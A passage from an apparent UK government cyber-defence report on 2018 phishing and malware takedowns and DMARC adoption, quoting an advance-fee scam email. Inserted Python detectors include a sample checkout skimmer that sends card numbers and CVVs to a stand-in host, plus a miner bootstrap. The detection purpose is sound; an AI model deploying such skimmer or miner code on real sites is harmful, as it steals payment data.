HMRC                             | 6,752          | 1,332                | 10
gov.uk                           | 3,811          | 771                  | 20
Government Gateway               | 1,173          | 318                  | 51
DVLA                             | 1,159          | 315                  | 15
TV Licensing                     | 1,124          | 185                  | 17
British Broadcasting Corporation | 21             | 14                   | 9
Student Loans Company            | 15             | 10                   | 14
University 1                     | 8              | 8                    | 2
University 2                     | 11             | 6                    | 12
University 3                     | 4              | 4                    | 0

Table 4: Top 10 phishing takedowns in 2018

2.2.2 Case study: HMRC

HMRC has been running a comprehensive programme to minimize the harm to UK citizens through abuse of the HMRC brand and processes. The takedown service is one part of that programme, but is useful as an indicator for how attractive the HMRC brand is to cyber criminals. There has been a dramatic reduction in the number of phishing attacks targeting HMRC over the past two years. The number of groups we’ve taken down targeting HMRC has fallen by 46% when comparing 2017 and 2018. In figure 3, we plot the number of groups taken down alongside the share of global phishing emails that target HMRC. By inspection, the graph shows a very pleasing trend, both in absolute volume and in terms of HMRC’s share of global phishing attacks.

We can use the number of unique IP addresses serving phishing attacks for a given brand as a proxy measure for how interested criminals are in monetising that brand. This is another proxy for how difficult it is to make money through attacking a particular brand. Figure 4 shows HMRC’s rank in terms of global brands that are phished between June 2016 and December 2018, based on the totality of data processed by Netcraft. For clarity, the higher the rank, the fewer phishing attacks we are seeing, which is a good thing. In June 2016, HMRC was a very popular target for cyber criminals, being ranked as the 16th most phished brand globally. In December 2018 HMRC is ranked as the 146th most phished brand globally. HMRC hasn’t changed its core business and still processes a lot of money, so in principle should still be an attractive target for criminals. However, the data shows that it isn’t as attractive any more. It’s pretty likely that this is a causal result of the work done by HMRC, of which the Takedown Service is one part. As a proof of principle, it seems that we can affect the return on investment for criminals and demotivate them from attacking things we care about. If government can do it, we can’t see any reason why businesses whose brands are trusted by the UK public can’t do it.

2.2.3 Government sending malware

One of the ways attackers try to use the HMG brand is by sending email with attachments that contain malware, purporting to be from HMG-related addresses. They use either mail servers that have been specifically set up to perform this task or, more often, misconfigured mail servers to do their bidding. These misconfigured mail servers are called ‘open relays’ because they are configured to allow anyone on the internet to send mail through them, which is ‘a bad thing’. When we detect a mail server sending malicious email in the name of HMG, we send notifications to the owners of the mail servers asking them to take appropriate action.

Figure 3: HMRC-related takedowns and share of global phishing. (Chart not reproduced: x axis Month, Jun-16 to Dec-18; left y axis No of takedowns, 0 to 500, series Groups taken down; right y axis Percentage of global phishing attacks, 0.2 to 1.2.)

Figure 4: HMRC rank as a global phishing target. (Higher is better) (Chart not reproduced: x axis Month, Jun-16 to Dec-18; y axis HMRC global phishing rank, 0 to 160.)

Figure 5a shows the volume of mail servers taken down over 2017 and 2018, with figure 5b showing just the 2018 takedowns.

(a) Number of mail servers sending malware in the name of HMG in 2017 and 2018. (Chart not reproduced: x axis Month, Jun-17 to Dec-18; y axis Malicious mail servers taken down, 0 to 30,000.)

(b) Number of mail servers sending malware in the name of HMG in 2018. (Chart not reproduced: x axis Month (2018), Jan to Dec; y axis Malicious mail servers taken down, 0 to 1,500.)

Figure 5: Mail servers abusing the HMG brand

There was a large spike of malicious mail server takedowns in August and September 2017, which we explained last year. Apart from that, there don’t appear to be any particularly interesting features across the data and there was no such spike in 2018. There appear to have been fewer takedowns in 2018. We are unable to draw any strong conclusions from this, but it appears this sort of attack just rumbles on. We should do some recurrence analysis on the mail servers to see if it’s a small population being reused or whether attackers actively hunt new open relays.

2.2.4 Malware infrastructure

When we see malware that is in some way related to an HMG brand, we try to minimize the harm it can cause by taking down the infrastructure that supports it. The types of infrastructure we take down include:

• Command and control - Once installed, malware needs to be able to receive commands or upload stolen data. We call the place on the internet that a piece of malware talks to its ‘command and control URL’ or ‘C2’. Taking down C2 infrastructure ensures that infected victim computers can’t talk to the criminals, thereby mitigating some of the harm.

• Distribution site - In some attacks, there are multiple stages to a malware infection, with existing malware installing new malware as an attack proceeds. The place that the malware is hosted for download is called a ‘distribution site’. If the distribution site is taken down, the next stage of malware cannot be installed, thereby mitigating some of the potential harm.

• Payment site - When the malware is actually ransomware, the criminal expects the victim to pay money. The payment site is the place the victim either registers or makes the payment. Taking down payment sites will prevent the malware distributors profiting from their activities, demotivating them.


Figure 6 shows the number of malware infrastructure takedowns performed since June 2017, by attack group. There was a large spike in June 2017 when this service first started, which is likely indicative of the relatively long life of malware infrastructure unless mitigating action is taken to remove it. Data for 2018 was relatively stable until the end of the year, when there was an increase in the number of attacks involving malware. We do not currently have a good explanation for the uptick at the end of 2018. 2019’s data may provide helpful context.

Figure 6: Groups of malware infrastructure taken down. (Chart not reproduced: x axis Month, Jun-17 to Dec-18; y axis Attack groups’ malware infrastructure taken down, 0 to 400.)

2.2.5 Advance fee fraud

Attackers will often impersonate well-known public sector organisations in order to extract a fee from their victims. This could be a deposit to supposedly secure a larger investment or a ‘transaction fee’ to transfer a large inheritance. And, of course, lots of people win lottery type things they never entered as well. We showed an example scam email in last year’s report. Our response to these is to ask the scammer’s email provider to remove access to their account. When they do so, the scammer can’t get any of the details the potential victims have sent, or further interact with them without changing email addresses, which should provide pause for thought in the victims. Figure 7 shows how many requests for email account takedown we’ve processed. It’s not clear we can draw any conclusions from this. A more useful measure would be the number of sets of personal details that had been sent to the fraudsters’ email accounts but, as detailed elsewhere, this is hard to get.

Table 5 shows the top brands impersonated by the advance fee fraud we see. Unsurprisingly, the top three impersonated brands all have something to do with money. By allying themselves with financial institutions, attackers seek to seem more professional and believable when asking for money - a very similar theme to the phishing attacks which spoof HMG. The volume of advance fee fraud seems broadly stable, so it’s reasonable to ask if we’re actually having any effect on this particular class of attack. The best way to know would be for us or law enforcement to gain access to the criminals’ mailboxes used to communicate with victims. That would allow proper analysis but has obvious issues which we’ve not worked out how to solve yet.

Figure 7: Advance Fee Fraud related email account takedowns. (Chart not reproduced: x axis Month, Jan-17 to Dec-18; y axis No email accounts taken down, 0 to 500.)

Brand                       | No Attack Groups 2017 | No Attack Groups 2018
National Lottery            | 1,172                 | 1,198
Financial Conduct Authority | 743                   | 813
Bank of England             | 73                    | 731

Table 5: Most abused brands for advance fee fraud.

2.2.6 Deceptive domains

Deceptive domains are those registered to try to fool a user into believing they are a legitimate domain and are normally used for phishing-like attacks, either over messaging (email, social etc) or through search engine optimisation. An example from 2018 is tax-rebate-dvla.co.uk. In 2018, we found 21 deceptive domains that were definitely hosting phishing sites and another 104 that were suspicious. The suspicious ones either redirected to a real site (which is very odd and probably a precursor to doing something bad in the future) or were for services that may or may not be related to real HMG things. It’s entirely possible that the ‘benign’ sites were part of a much more stealthy and targeted campaign where the malicious content is hosted on single use URLs under that domain and nothing bad is ever hosted in the root (and stealthy so we don’t see the phishing lures in email feeds). We’ve no evidence either way, unfortunately. It’s hard to tell sometimes and we’re very careful about not taking down good things. In the grand scheme of things, deceptive domains impersonating HMG related brands still don’t seem to be a massive problem.

2.3 Malicious hosting in UK IP space

By taking down phishing and malware attacks when we see them in UK IP space, regardless of the brand abused, we intend to make the UK a more difficult place to host these attacks. While in and of itself this doesn’t affect the global attacks against the UK, we hope to lead by example. If we can show that a relatively simple set of actions can make a delegated IP space a harder place to host badness, we can get on our high horse and try to get other responsible countries and entities to do similar things. Coordinated action would make hosting badness globally much harder and therefore increase the cost of launching these attacks in the first place and reduce the return on investment. As we said last year, that’s one of the main objectives of the ACD programme.

2.3.1 UK IP space phishing

In 2018, we took down 22,133 phishing campaigns hosted in UK delegated IP space, totalling 142,203 individual attacks. Figure 8 shows the number of attack groups taken down over 2017 and 2018.

Figure 8: The number of attack groups hosted in UK IP space and taken down in 2017 and 2018. (Chart not reproduced: x axis Month, Jan-17 to Dec-18; y axis Number of groups taken down, 1,200 to 2,400.)

Similar to the HMG-related phishing statistics, we show the pre-service baseline availability statistics and statistics for 2017 and 2018 in table 6. Even though this year’s results are slightly worse than last year’s, comparing the baseline to 2018 figures, UK hosted phishing sites have less longevity than before we started. There is an obvious harm reduction consequence for this. However, there is not an obvious trend in the number of groups taken down in UK IP space over the past two years; if anything it’s broadly constant. However, it would appear that the number of attacks per group has been rising, as shown in figure 9.

Measure                 | Baseline Value | 2017 Value | 2018 Value
Mean (hours)            | 254.8          | 66.9       | 125.6
Median (hours)          | 26.3           | 3.5        | 9.1
Skewness                | 6.9            | 10.2       | 9.3
25th percentile (hours) | 3.2            | 0.5        | 1.3
75th percentile (hours) | 173.6          | 23.0       | 41.0
Sites down in 4 hours   | 25.9%          | 56.7%      | 39.0%
Sites down in 24 hours  | 47.3%          | 76.8%      | 69.1%

Table 6: Statistics for baseline, 2017 and 2018 availability of phishing sites in UK IP space

Figure 9: The number of attacks per group hosted in UK IP space in 2017 and 2018. (Chart not reproduced: x axis Month, Jan-17 to Dec-18; y axis Attacks per group, 0 to 8.)

The upward trend of attacks per group appears to be mirrored worldwide, as shown in figure 10.

Even though it appears that criminal hosting behaviour is changing (since the number of attacks per group is rising) this doesn’t appear to affect the UK’s global share of phishing; that is, the percentage of all phishing that the UK hosts. Last year, we reported that the UK’s share of global phishing was falling. We’re pleased to report that this is a trend which continues into 2019, as shown in figure 11.

The spike in September is due to a single phishing campaign, hosted by a service which has free accounts. In the past, the service in question often hosted malicious attacks unwittingly but more recently has greatly improved. We believe that the spike in September was just a blip and expect to see the downward trend continue.

Figure 10: The number of attacks per group worldwide. (Chart not reproduced: x axis Month, Jun-16 to Dec-18; y axis Attacks per Group, 0 to 10; series UK and non-UK.)

2.3.2 Web-inject malware in UK IP space

Web-inject malware instances tend to be real sites that have been taken over by attackers in order to compromise visitors to the site. As the site is genuine, it needs to be fixed rather than taken down, which can take longer. In 2018, we notified 1,362 sites that they had been compromised, and 1,287 (or 94.5%) of sites were fixed. Since we’ve been notifying owners and hosters of web-inject malware instances, the number of web-inject malware pages we’ve detected and asked to be fixed or taken down has fallen steadily, as shown in figure 12. We show both individual attacks and attack groups in case the relationship is different to other takedowns. Table 7 shows the statistics for the distribution of the requests for remediation. We believe this reduction is at least partly due to our intervention as UK-hosted compromised sites become less profitable for the criminal because the compromising code is active for a shorter time.

Figure 11: Percentage of phishing hosted in UK delegated IP space. (Chart not reproduced: x axis Month, Jun-16 to Dec-18; y axis UK-Hosted Share of Phishing, 0 to 5.)

Measure                 | Baseline Value | 2017 Value | 2018 Value
Mean (hours)            | 807.2          | 513.4      | 885.3
Median (hours)          | 525.1          | 39.1       | 54.7
Skewness                | 3.9            | 3.2        | 2.4
25th percentile (hours) | 125.8          | 3.6        | 4.0
75th percentile (hours) | 1,084.9        | 340.3      | 715.2
Sites down in 4 hours   | 3.4%           | 17.3%      | 25%
Sites down in 24 hours  | 9.9%           | 33.8%      | 40%

Table 7: Statistics for baseline, 2017 and 2018 availability of web-inject sites in UK IP space

2.4 New types of takedown

2.4.1 Web shells

A web shell is a method for attackers to execute commands remotely on a device and one is often installed along with other malicious content to provide persistence for an attacker. If the main malicious content is removed, the attacker can use the web shell to reinstall it, or other malicious content. Some web shells can also run arbitrary code on the compromised machine, allowing for activities such as password cracking and spam campaigns or making the machine part of a botnet. Depending on how it is placed, a web shell can also allow an attacker to pivot into the internal network, where they can work to understand how the network is set up and find user accounts to try to breach. Web shells are used by criminals, but also some more advanced actors. Basically, they’re bad things.

We now automatically commence takedowns against web shells - both those hosted in UK IP space and those that support phishing attacks targeting HMG brands. Figure 13 shows the volume of takedowns of web shells in 2018. Note that we started the service in late January, and took down 61 web shells in those few days. We’ve not plotted the January data.

Ignoring the January data point, the number of notifications we’ve sent has been fairly steady. It’s reasonable to make the assumption that the majority of the web shells we see are related to phishing attacks that we see, given how they’re found. Unfortunately, there’s not a significant correlation between the number of takedowns of web shells and the related phishing attacks.

Figure 12: Number of web-injects notified in the UK. (Chart not reproduced: x axis Month, Jan-17 to Dec-18; y axis Number of notifications, 0 to 800; series Web-inject Groups and Web-inject Attacks.)

Figure 13: Web shells taken down in 2018. (Chart not reproduced: x axis Month (2018), Feb to Dec; y axis Groups taken down, 0 to 250.)

More data may help us understand the real relationship between web shells and other badness.

2.4.2 UK legal system advance fee fraud

Impersonation of the legal system is used as a common lure in advance fee fraud attacks. Both bogus law firms, and impersonation of legitimate law firms, are techniques used by fraudsters in an attempt to increase the credibility of their attacks. Increasingly, we’re seeing scammers use real law firms and other entities to try to make their attacks look more legitimate. If someone is partially hooked by an email, searching for the law firm or other entities in the mail and finding they’re real is probably enough to push them over the edge.

We show an example below, where a real priest at a real church and a real barrister at a real law firm are all used in an attempt to make this story more plausible. We’ve obfuscated the names - one of them is a lawyer, after all!

Greetings in the name of our Lord Jesus,

I have tried reaching you through a wrong email address on several

occasions without knowing it was wrong. I just discovered your correct

address, which is why my notification is coming late.

I’m pleased to inform you that you were made a beneficiary in the Will of

late Mr. Javier de la Rosa. Please contact the executor of the Will,

Barrister Stephen Bxxxxxxx for more information on how to claim your

inheritance.

Barr. Stephen Bxxxxxxx

[email protected]

+44 000 000 0000

I would appreciate your acknowledgement for receipt of my notification.

Remain blessed in the lord.

Yours Truly,

Rev. Steve xxxxxx

Holy Trinity xxxxx Church,

xxxxx Ln,

xxxxxxxx, XX1 1XX,

United Kingdom

There’s no common brand being abused here, so no-one is incentivised to go after these attacks. Neither the barrister nor the church in the example we use will suffer any loss or harm as a result. Also, given the entities used and the language, this specific attack is obviously directed at UK citizens. In March 2018, Netcraft began taking down these kinds of attacks. Specifically, we started performing takedowns against fraudster email addresses being used in advance fee fraud attacks that target UK citizens by using terminology specific to the UK legal system such as Barrister, Solicitor, Queen’s Counsel, and common chambers used by Barristers. Figure 14 shows the volume of takedowns since the service started.

We don’t really have enough data to make any firm conclusions about UK legal system attacks yet, although it’s interesting that we’re seeing a few hundred attacks a month of this flavour. Hopefully we’ll be able to say something more concrete next year.

Figure 14: UK legal system related advance fee fraud attacks taken down. (Chart not reproduced: x axis Month (2018), Mar to Dec; y axis Groups taken down, 0 to 800.)

2.4.3 Non-consensual Monero mining

Monero is an open-source cryptocurrency with a focus on privacy. Due to its use of an ‘obfuscated public ledger’, an outside observer cannot track any transactions of the coin, or an account’s balance. This makes it particularly attractive to criminals as transactions are virtually untraceable. Recently JavaScript Monero mining has been discussed as a way of monetising visitors to a website in a similar way to advertising. In principle this seems reasonable. However, on the usage we have seen, it’s primarily a way of monetising hacked sites. We have now started looking for Monero mining code on websites hosted in UK delegated IP space. We contact both the webmaster and the hosting company informing them of the possible compromise and explain to them that if this code hasn’t been added with the webmaster’s knowledge, then the site is likely under the control of a criminal and they should take action to remove the criminal’s code and secure the site. We’ve had a flurry of responses from webmasters and hosting companies. The majority of these are thanking us for our reports and confirming action has been taken.

However, there have been a few where the webmasters have confirmed the code was intentional[6]. It’s an interesting trend that we should keep an eye on. Figure 15 shows the number of malicious instances notified for takedown. Again, there’s not enough data yet to draw any strong conclusions. Interestingly, of the sites hosted in the UK that we’ve found to have Monero mining code, almost 80% do so using Coinhive. The next most common is http://minr.pw [7], which accounts for approximately 5%. The others that we have discovered so far are carbon copies of Coinhive - including utilising the same underlying Monero mining implementation.

2.4.4 Shopping site skimmers

Lots of people use the open source ecommerce package Magento to build their shopping site. Lots of people just install this package as part of their hosting deal and forget about it. Like all

[6] Originally, we were going to call this ‘criminal Monero mining’. This explains why this section of the paper has quite a ‘legalese’ title.

[7] Coinhive and minr.pw are Monero mining services. Coinhive is no longer active at the time of writing.


[Figure 15 chart: bars of Monero instances notified per month; x-axis Month (2018), March to December; y-axis Monero instances notified, 0 to 250.]

Figure 15: Non-consensual Monero mining instances hosted on UK delegated IP

software, Magento needs patching and people seem to forget that. We’ve seen criminals exploit vulnerabilities in these unpatched sites to compromise them and install malicious code in the checkout page. This malicious code just skims the customers’ credit card details as they check out of the real site. The site owner doesn’t know anything about it - they still have a fully functioning shopping site.
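As an added illustration of the kind of check sections 2.4.3 and 2.4.4 describe (this is not code from the report or from the takedown service), the Python below scans a page’s scripts for the two Monero mining services named above (Coinhive’s library and its documented `CoinHive.Anonymous` bootstrap, and minr.pw) and, separately, for an inline script that reads card-number or CVV fields and sends them to a host other than the shop’s own. The three sample pages, the site host name `shop.example`, the site key placeholder and the exfiltration host are constructed for the example; the skimmer heuristic is our own assumption about what injected checkout code looks like and needs tuning before use on real sites.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Miner services named in the report; further Coinhive clones would be added here.
MINER_HOSTS = {"coinhive.com", "coin-hive.com", "minr.pw"}
# Coinhive's browser API was `new CoinHive.Anonymous(siteKey)` / `CoinHive.User(...)`.
MINER_INLINE = re.compile(r"CoinHive\.(?:Anonymous|User)\s*\(|minr\.pw", re.I)

# Skimmer heuristic (an assumption for this example, not from the report): an inline
# script that touches card fields AND uses a network primitive AND names an off-site host.
CARD_FIELDS = re.compile(r"cc_number|card[_-]?number|cvv|cvc|exp(?:iry|_month|_year)", re.I)
EXFIL_CALLS = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(", re.I)
URL_HOSTS = re.compile(r"https?://([a-z0-9.-]+)", re.I)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from one page."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _host_of(src):
    """Hostname of a script src attribute; '' for relative URLs."""
    url = src if "//" in src else "//" + src
    return (urlparse(url).hostname or "").lower()


def scan_page(html, site_host):
    """Return a list of (kind, detail) findings: kind is 'miner' or 'skimmer'."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.srcs:
        host = _host_of(src)
        if host in MINER_HOSTS or any(host.endswith("." + m) for m in MINER_HOSTS):
            findings.append(("miner", f"miner library loaded from {host}"))
    for body in parser.inline:
        if MINER_INLINE.search(body):
            findings.append(("miner", "inline Coinhive-style miner bootstrap"))
        if CARD_FIELDS.search(body) and EXFIL_CALLS.search(body):
            offsite = sorted({h.lower() for h in URL_HOSTS.findall(body)
                              if h.lower() != site_host.lower()})
            if offsite:
                findings.append(("skimmer", "card fields read and sent to " + ", ".join(offsite)))
    return findings


# Constructed sample pages (not real sites); the site key and hosts are placeholders.
CLEAN_PAGE = (
    '<html><body><script src="/js/app.js"></script>'
    '<script>console.log("checkout ready");</script></body></html>'
)
MINER_PAGE = (
    '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    '<script>var miner = new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER"); miner.start();</script>'
    '</head></html>'
)
SKIMMER_PAGE = (
    '<html><body><form id="checkout"><input name="cc_number"><input name="cvv"></form>'
    '<script>document.getElementById("checkout").addEventListener("submit", function () {'
    '  var d = JSON.stringify({n: document.getElementsByName("cc_number")[0].value,'
    '                          c: document.getElementsByName("cvv")[0].value});'
    '  var x = new XMLHttpRequest(); x.open("POST", "https://stats-collector.example/save"); x.send(d);'
    '});</script></body></html>'
)

if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("miner", MINER_PAGE), ("skimmer", SKIMMER_PAGE)]:
        print(name, scan_page(page, "shop.example"))
```

The miner check is a plain indicator match and will not catch a self-hosted copy of the Coinhive library; the skimmer check deliberately requires all three signals together, because card-field names alone appear in every legitimate checkout and network calls alone appear in every analytics tag.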


[Figure 16 chart: bars of sites notified per month; x-axis Month (2018), January to December; y-axis Number of sites notified, 0 to 800; series: Attacks, Groups.]

Figure 16: Number of compromised Magento installations in the UK.

Figure 16 shows the rate of notification of compromised sites. Again, we show both individual attacks and attack groups as the relationship may be different for this sort of attack. The service only commenced in March and so the zero values in January and February are due to no work being done. Funding issues caused a hiatus in the service provision across July, August, September and October, but as the service recommenced in November we see a significant increase in the rate of discovery, suggesting that the service is having a real protective effect. In total, 3,258 sites in 788 attack groups were fixed after notification in 2018, with 97 sites in 26 groups remaining compromised. Of those 3.0% of sites that remained unmitigated at the end of the year, most had been compromised for a significant amount of time, probably showing that the owners of the sites were not maintaining them properly. It will be interesting to see how this progresses over the next year.

2.5 Hosters’ takedown records

One of the challenges we see is the difference between us notifying a hosting company and that hosting company taking action against malicious content. We can claim lots of goodness in terms of reporting, but if the content isn’t taken down then there’s not much protective effect. So, it would be interesting to look at those hosting providers who still host things we believe to be malicious after we’ve notified them, but haven’t told us it’s a false positive, by percentage of sites available. Given we are looking at percentage of sites reported, it seems reasonable to limit ourselves to those hosters to whom we have reported more than 10 malicious sites. Given that, Table 8 shows the top 15 hosters, by percentage, that have not removed notified content and have not claimed a false positive notification.

There are two good things in these data. Firstly, the absolute numbers of recalcitrant domains are small. Secondly, the percentages involved fall off quickly, suggesting that the vast majority


Hoster                       Percentage   Count
webhostingconsultants.com        100.00      12
vTitan                            72.50      29
Invitel                           68.42      13
Hurricane Electric                59.18      29
Mail.ru Group                     56.36      31
AusRegistry                       52.00      13
EuroDNS                           41.67      20
Tencent                           30.00      12
Bodis                             27.61      37
Hostwinds                         22.06      15
Yahoo! Japan Corporation          19.86      28
Nimbus Hosting                    16.98      45
British Telecom                   14.58      57
Nimbus Hosting                     9.81      26
Verizon                            8.14     129

Table 8: Hosters failing takedowns

of hosters respond well to our requests.

2.6 Deceptive domains

Once again, we have used DNS zone transfers from a large number of TLD zones to find domain name registrations that could be used as deceptive domains, that is domains that are designed to deceive victims into believing they are interacting with a real site. We observe the sites attached to the domain to see if they are being used for anything malicious. As soon as something malicious is hosted on the site, we commence a takedown.
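As an added example of the kind of screen applied to zone-transfer output (the report does not publish the search criteria it uses, and this is not the service’s code), the Python below flags a candidate domain as deceptive when a protected brand token appears in a name whose registrable domain the brand does not own. The mini public suffix list, the brand token table and the candidate names are constructed for the example; the deceptive domain the report itself gives later, taxrefund.secure.hmrc.gov.uk.cf, is among the candidates.

```python
import re

# Constructed mini public suffix list; a real deployment uses the full PSL.
PUBLIC_SUFFIXES = {"com", "net", "cf", "uk", "co.uk", "gov.uk", "org.uk"}

# Brands to protect: real registrable domain -> tokens a lookalike would reuse.
# The token lists are an assumption for this example, not the NCSC's search criteria.
BRANDS = {
    "gov.uk": ["gov.uk", "govuk", "gov-uk"],
    "hmrc.gov.uk": ["hmrc"],
    "dvla.gov.uk": ["dvla"],
}


def registrable_domain(fqdn):
    """Public-suffix-plus-one label, or None if the name is itself a public suffix."""
    labels = fqdn.lower().strip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:      # longest matching suffix
            return ".".join(labels[i - 1:]) if i > 0 else None
    return ".".join(labels[-2:])                          # unknown TLD: assume one-label suffix


def classify(fqdn):
    """('deceptive', hits) when a brand token appears in a name the brand does not own."""
    name = fqdn.lower().strip(".")
    reg = registrable_domain(name)
    hits = []
    for real, tokens in BRANDS.items():
        if reg and (reg == real or reg.endswith("." + real)):
            continue  # genuinely inside the brand's own registrable domain
        for tok in tokens:
            # Token must be a whole label or label fragment bounded by '.', '-' or an end.
            if re.search(r"(?<![a-z0-9])" + re.escape(tok) + r"(?![a-z0-9])", name):
                hits.append((real, tok))
    return ("deceptive" if hits else "not-deceptive"), hits


def triage(candidates):
    """Group zone-transfer candidates by verdict; 'deceptive' names go on the watch list."""
    buckets = {"deceptive": [], "not-deceptive": []}
    for fqdn in candidates:
        verdict, _ = classify(fqdn)
        buckets[verdict].append(fqdn)
    return buckets


# Constructed candidates, including the report's own example of a deceptive domain.
CANDIDATES = [
    "taxrefund.secure.hmrc.gov.uk.cf",
    "hmrc-gov-uk.com",
    "dvla.refund.example.net",
    "www.hmrc.gov.uk",
    "taxrefund.gov.uk",
    "example.com",
]

if __name__ == "__main__":
    for fqdn in CANDIDATES:
        print(fqdn, *classify(fqdn))
```

Note that a name such as taxrefund.gov.uk is not deceptive under this definition even though it may not exist: it is inside gov.uk, and whether mail or sites under a genuine gov.uk name are legitimate is a question for the DMARC and synthetic DMARC work in chapter 3, not for the deceptive domain feed.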

In 2018, we observed 8,432 domains that met our search criteria. Of those :

• 5,147 domains were totally legitimate

• 902 were speculatively registered by ad networks or being held for other reasons

• 779 domains were classed as ‘benign’, but continued to be monitored

• 1,407 sites were unavailable, with either the domain having been removed already or there being no hosting associated with it

• 101 domains were classed as suspicious, and were continually monitored

Of all 8,432 domains observed in this way in 2018, only 96 were confirmed as phishing sites. The ‘benign’ sites are subject to the same caution as described in section 2.2.6.

In the same time frame, we observed 4,734 SSL certificates on sites that matched our criteria. Of these, 4,043 were totally legitimate. 58 domains were deemed suspicious and only one (which turned out to be legitimate) had an Extended Validation certificate. Of the rest, all were Domain Validation certificates with 18 being issued by a cPanel CA and 27 by the Let’s Encrypt CA. Only 3 domains were linked to confirmed phishing sites. Of those, two certificates were issued by Let’s Encrypt and one by Amazon. They were all domain validation certificates.

Due to the proactive work we do, deceptive domains still don’t appear to be a big problem for us.


2.7 SSL certificates

We looked at the issuers of all the SSL certificates that are implicated in our takedowns. Table 9 details the top 10 issuers for certificates implicated in HMG-related phishing attacks and Table 10 the same for UK hosted phishing attacks.

Certificate Issuer              Certificate Count
No certificate                              9,603
Let’s Encrypt                               2,193
cPanel, Inc.                                1,455
COMODO CA Limited                             435
GoDaddy.com, Inc.                             391
CloudFlare, Inc.                               93
DigiCert Inc                                   66
Symantec Corporation                           51
Starfield Technologies, Inc.                   48
GlobalSign nv-sa                               18
Site Blindado S.A.                              6

Table 9: Top 10 certificate issuers for HMG-related phishing attacks

Certificate Issuer              Certificate Count
No certificate                             77,709
cPanel, Inc.                               31,562
Let’s Encrypt                              22,573
DigiCert Inc                                4,430
COMODO CA Limited                           4,081
GeoTrust Inc.                                 846
Starfield Technologies, Inc.                  546
GlobalSign nv-sa                              302
Microsoft Corporation                         194
CloudFlare, Inc.                              145
The USERTRUST Network                          96

Table 10: Top 10 certificate issuers for UK hosted phishing attacks

This covers both sites that have been compromised in order to host malicious content and sites that have been set up specifically for malfeasance. It’s obvious that the vast majority of certificates used are free Domain Validated certificates from Let’s Encrypt or the certificate authority associated with the popular cPanel hosting management software. Intuitively, it makes sense that malicious actors will be less worried about short-lived certificates than many enterprises and avoid using identifying or criminally acquired payment instruments where possible. This could explain the prevalence of Let’s Encrypt certificates. Similarly, the cPanel CA is associated with a hosting package that we know is often not maintained well by its users, possibly explaining the link between compromised sites and cPanel certificates.


2.8 Conclusion

It is obvious that the proactive work undertaken through the Takedown Service continues to have a harm reduction effect at scale. We have shown a consistent reduction in the value to criminals of hosting malicious content in the UK, and that actively protecting specific government-related brands can reduce the harm caused through their abuse. While there is certainly more to do in the UK, we believe that we have shown sufficient benefit to start asking hard questions of other governments in terms of their delegated IP space and high value brands in terms of their interface with the public.


3 Mail Check

Mail Check is a service to help public sector organisations check and maintain the security configuration of their email infrastructure, including proper DMARC configuration and support for email transport encryption. One of the primary goals is to support and encourage adoption of DMARC, which, along with the SPF and DKIM protocols, is a powerful tool against spoofing and phishing. As described last year, Mail Check helps domain administrators understand the effects of their email security configurations by performing the hard analysis of all the various feedback routes on their behalf, and presenting the results in a user friendly format.

3.1 DMARC and Microsoft

Late in 2017, Microsoft stopped sending any form of DMARC reports from any of its mail platforms, enterprise or consumer. Microsoft’s email platforms together form one of the biggest receivers of email. As a result, this has had a massively negative effect on the community’s ability to draw conclusions about email security driven by DMARC adoption and it is almost impossible for us to compare meaningful statistics from this year with statistics from last year. As an example, last year, we talked about the volume of emails we saw, both in total and the number of emails failing DMARC. However, it would be unfair to compare those statistics directly to this year’s, due to us not having any data from one of the world’s biggest email providers. We’ll still report what we can stand behind, but any comparisons between numbers related to reporting from receivers from last year would be invalid, so we’re not including them. We, and many others, are in discussion with Microsoft about this. This chapter is therefore somewhat smaller than it could have been. Sorry.

3.2 Last year in Mail Check

Various email anti-spoofing capabilities have been defined over the years, but adoption remains relatively slow. Part of the NCSC’s mantra is to eat our own dog food, so we use ‘government as a guinea pig’ in the Active Cyber Defence work to understand any blockers to deployment and to work out ways to fix them for all. Of course, that means pushing for deployment across public sector email domains. Mail Check monitors public sector domains for SPF, DKIM and DMARC configurations. There are also a number of critical national infrastructure related domains in there so we can understand what email configurations look like across those partners.

Of the 6,974 domains monitored by Mail Check, 6,273 are classed as public sector. The number of public sector domains that had DMARC more than tripled from 412 at the end of December 2017[8] to 1,369 by the end of December 2018. The number of domains with a DMARC policy of p = quarantine or p = reject (i.e. actively preventing suspicious emails being delivered to recipients’ inboxes) also tripled from 192 to 572.

This is obviously a significant uplift in the public sector adoption of email security protocols, but there remains more to do in driving adoption across public sector to prefer stronger DMARC policies, and then encouraging wider industry in the UK (and more widely) to similarly adopt the protocols.

[8] Over the course of 2018, we improved our reporting approach to allow for better comparison of figures over time (and fixed some bugs), hence this number (412) being lower than the number presented in last year’s report (555). Sorry.


3.3 On email providers

DMARC relies on email providers to treat email as requested by the sending domain policy. For example, in an ideal world, any emails that fail the authentication requirements (neither aligned SPF nor aligned DKIM passes) that are received from a sending domain with a DMARC policy of p = reject should never even reach the intended receiver’s account. It won’t go into their inbox, it won’t go into their spam folder, it should never be possible for a user to see an email that has failed authentication with a DMARC policy of p = reject.

It turns out that how email providers treat reject records varies, and not all of them completely reject a reject. If, for example, a rejected email is still allowed into a spam folder, and it turns out to be a phishing email, the likelihood of the user digging out the mail and actioning it goes from zero to greater than zero. Believe it or not, we have a few actual incidents where someone actioning an email that ended up in their spam folder was the way in[9]. We need the industry to be more consistent in how they action a domain’s DMARC policies and there is significant work to be done here.

3.4 Why we stopped collecting forensic reports

